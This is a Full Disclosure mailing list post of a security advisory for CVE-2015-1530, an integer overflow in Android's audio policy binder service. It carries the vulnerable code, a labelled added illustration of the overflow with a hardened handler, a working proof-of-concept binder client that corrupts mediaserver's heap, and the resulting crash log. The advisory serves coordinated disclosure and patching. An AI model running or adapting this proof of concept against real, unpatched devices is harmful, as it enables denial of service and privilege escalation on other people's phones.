Message-ID: <CAC-hzSqFiFdPLWM3+41tdrSBBea1wFH+=SHqMibEvMLf=-UcOQ@mail.gmail.com>
Date: Thu, 12 Mar 2015 10:21:12 +0800
From: Guang Gong <higongguang@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] [CVE-2015-1530]An integer overflow in Android media could be exploited to get media_server permission

Correct the format

#############################################################################
#
#   QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID:   CVE-2015-1530
# Product:   Android
# Vendor:   Google
# Subject:   An integer overflow in Android media could be exploited to get media_server permission
# Effect:  Gain privileges or cause a denial of service
# Author:  Guang Gong
# Date:     March 11th 2015
#
#############################################################################


Introduction
------------
An integer overflow in the BnAudioPolicyService::onTransact function in
frameworks/av/media/libmedia/IAudioPolicyService.cpp in Android through 5.0
allows attackers to gain privileges or cause a denial of service (memory
corruption) via a transaction that carries a large count value.

Affected Android version
------------------------
All versions before Lollipop 5.1.

Patches
-------
Android Bug id 18226810
https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160


Description
-----------
The vulnerable code is as follows.

http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661
case QUERY_DEFAULT_PRE_PROCESSING: {
656         CHECK_INTERFACE(IAudioPolicyService, data, reply);
657         int audioSession = data.readInt32();
658         uint32_t count = data.readInt32();
659         uint32_t retCount = count;
660         effect_descriptor_t *descriptors =
661                 (effect_descriptor_t *)new char[count * sizeof(effect_descriptor_t)];
                // ^ count can be set to any value by the binder client. The
                //   multiplication count * sizeof(effect_descriptor_t) can
                //   overflow, so the buffer is undersized and the writes into
                //   it corrupt the heap.
662         status_t status = queryDefaultPreProcessing(audioSession, descriptors, &retCount);
663         reply->writeInt32(status);
664         if (status != NO_ERROR && status != NO_MEMORY) {
665             retCount = 0;
666         }
667         reply->writeInt32(retCount);
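The following C program is an added illustration, not code from the advisory or from AOSP. It models the size computation on the 32-bit ARM target described above (so the multiplication is done in uint32_t and wraps just as it does in the vulnerable line 661), shows how to detect that a given client-supplied count would overflow, and contrasts it with a hardened handler that bounds the count and guards the multiplication before allocating. The struct descriptor_t, the bound MAX_DESCRIPTORS and the function names are constructed for the example; they are not the real effect_descriptor_t and they do not claim to reproduce the exact AOSP fix.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Stand-in for effect_descriptor_t: constructed for this example, not the real
 * Android struct. Only its size matters here. */
typedef struct { uint8_t opaque[64]; } descriptor_t;

/* Upper bound on how many descriptors one request may ask for. An assumed
 * limit chosen for the example, not a value from the advisory or the patch. */
#define MAX_DESCRIPTORS 256u

/* Models the vulnerable computation on the 32-bit target: the product is
 * formed in 32 bits and wraps silently, so a huge client-supplied count can
 * produce a buffer much smaller than the number of descriptors written to it. */
uint32_t wrapped_alloc_bytes(uint32_t count) {
    return count * (uint32_t)sizeof(descriptor_t);
}

/* Returns 1 if the 32-bit product differs from the mathematically correct
 * size (i.e. the multiplication overflowed), 0 otherwise. */
int alloc_size_overflows(uint32_t count) {
    uint64_t true_bytes = (uint64_t)count * sizeof(descriptor_t);
    return true_bytes != (uint64_t)wrapped_alloc_bytes(count);
}

/* Hardened handler: validates the client-controlled count before allocating.
 * Returns 0 on success and -1 if the request is rejected; on rejection
 * *ret_count is set to 0, mirroring the retCount = 0 path in the service. The
 * array is freed before returning because this example only exercises the
 * validation, not the descriptor lookup. */
int handle_query_checked(uint32_t count, uint32_t *ret_count) {
    if (count == 0 || count > MAX_DESCRIPTORS) {
        *ret_count = 0;
        return -1;                        /* unreasonable request: refuse it */
    }
    /* Defence in depth: even below the bound, never let the product exceed
     * what size_t can hold. */
    if (count > SIZE_MAX / sizeof(descriptor_t)) {
        *ret_count = 0;
        return -1;
    }
    /* calloc performs its own overflow-checked multiplication. */
    descriptor_t *descriptors = calloc(count, sizeof(descriptor_t));
    if (descriptors == NULL) {
        *ret_count = 0;
        return -1;
    }
    /* ... a real service would fill in up to count descriptors here ... */
    *ret_count = count;
    free(descriptors);
    return 0;
}
```

With a 64-byte element, any count of 0x04000000 or more wraps: 0x04000001 yields a 64-byte buffer while the caller believes it holds 67,108,865 descriptors. The hardened handler rejects such a count long before the allocation, which is the property to look for when reviewing any Binder handler that derives an allocation size from a client-supplied integer.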

Attack vector
-------------
A normal app can corrupt the heap in mediaserver through this vulnerability.
The PoC that corrupts the heap is as follows:
#include <binder/Parcel.h>
#include <binder/ProcessState.h>
#include <binder/IServiceManager.h>
#include <media/IAudioPolicyService.h>
#include <binder/TextOutput.h>
#include <system/audio.h>
#include <sys/stat.h>
#include <fcntl.h>

using namespace android;

int main(__attribute__((unused)) int argc, __attribute__((unused)) char* const argv[])
{
    // Look up the audio policy service exposed over binder.
    sp<IServiceManager> sm = defaultServiceManager();
    sp<IBinder> service = sm->checkService(String16("media.audio_policy"));

    sp<IAudioPolicyService> iPolicy = IAudioPolicyService::asInterface(service);
    effect_descriptor_t descriptors;
    // Oversized count; the service multiplies it by sizeof(effect_descriptor_t).
    uint32_t count = 0xfffffff;

    iPolicy->getInput((audio_source_t)0, 8000, (audio_format_t)1, AUDIO_CHANNEL_IN_FRONT, 1);

    iPolicy->queryDefaultPreProcessing(1, &descriptors, &count);
    return 0;
}

The crash log is as follows:
--------- beginning of crash
F/libc    (  184): new[] failed to allocate 3221225300 bytes
F/libc    (  184): Fatal signal 6 (SIGABRT), code -6 in tid 654 (Binder_1)
I/DEBUG   (  180): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  180): Build fingerprint: 'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
I/DEBUG   (  180): Revision: '10'
I/DEBUG   (  180): ABI: 'arm'
I/DEBUG   (  180): pid: 184, tid: 654, name: Binder_1  >>> /system/bin/mediaserver <<<
I/DEBUG   (  180): signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
W/NativeCrashListener(  613): Couldn't find ProcessRecord for pid 184
I/DEBUG   (  180): Abort message: 'new[] failed to allocate 3221225300 bytes'
E/DEBUG   (  180): AM write failure (32 / Broken pipe)
I/DEBUG   (  180):     r0 00000000  r1 0000028e  r2 00000006  r3 00000000
I/DEBUG   (  180):     r4 b46ffdb8  r5 00000006  r6 0000000c  r7 0000010c
I/DEBUG   (  180):     r8 0fffffff  r9 000003f5  sl 000000b8  fp 00000001
I/DEBUG   (  180):     ip 0000028e  sp b46ffab8  lr b6f44941  pc b6f6676c  cpsr 60070010
I/DEBUG   (  180):
I/DEBUG   (  180): backtrace:
I/DEBUG   (  180):     #00 pc 0003576c  /system/lib/libc.so (tgkill+12)
I/DEBUG   (  180):     #01 pc 0001393d  /system/lib/libc.so (pthread_kill+52)
I/DEBUG   (  180):     #02 pc 000143e7  /system/lib/libc.so (raise+10)
I/DEBUG   (  180):     #03 pc 00010e8d  /system/lib/libc.so (__libc_android_abort+36)
I/DEBUG   (  180):     #04 pc 0000f954  /system/lib/libc.so (abort+4)
I/DEBUG   (  180):     #05 pc 00012225  /system/lib/libc.so (__libc_fatal+16)
I/DEBUG   (  180):     #06 pc 000128fd  /system/lib/libc.so (operator new[](unsigned int)+16)
I/DEBUG   (  180):     #07 pc 00056367  /system/lib/libmedia.so (android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+1158)
I/DEBUG   (  180):     #08 pc 000167a5  /system/lib/libbinder.so (android::BBinder::transact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+60)
I/DEBUG   (  180):     #09 pc 0001aea3  /system/lib/libbinder.so (android::IPCThreadState::executeCommand(int)+562)
I/DEBUG   (  180):     #10 pc 0001afbf  /system/lib/libbinder.so (android::IPCThreadState::getAndExecuteCommand()+38)
I/DEBUG   (  180):     #11 pc 0001b001  /system/lib/libbinder.so (android::IPCThreadState::joinThreadPool(bool)+48)
I/DEBUG   (  180):     #12 pc 0001ee93  /system/lib/libbinder.so
I/DEBUG   (  180):     #13 pc 0000e97d  /system/lib/libutils.so (android::Thread::_threadLoop(void*)+112)
I/DEBUG   (  180):     #14 pc 0000e505  /system/lib/libutils.so
I/DEBUG   (  180):     #15 pc 00013133  /system/lib/libc.so (__pthread_start(void*)+30)
I/DEBUG   (  180):     #16 pc 0001120b  /system/lib/libc.so (__start_thread+6)
I/DEBUG   (  180):
I/DEBUG   (  180): Tombstone written to: /data/tombstones/tombstone_00
I/BootReceiver(  613): Copying /data/tombstones/tombstone_00 to DropBox (SYSTEM_TOMBSTONE)



Milestones
----------

Date        Comment                                                Sender
03/11/2014  Initial report of CVE-2015-1530                        Qihoo
08/11/2014  Validated and created a suitable fix internally        Google
11/11/2014  Sent the Android Bug ID 18226810                       Google
10/2/2015   Sent the CVE-ID                                        Google
11/3/2015   Lollipop 5.1 was released, disclose it                 Qihoo


References
----------
[1]
https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160
[2]
http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
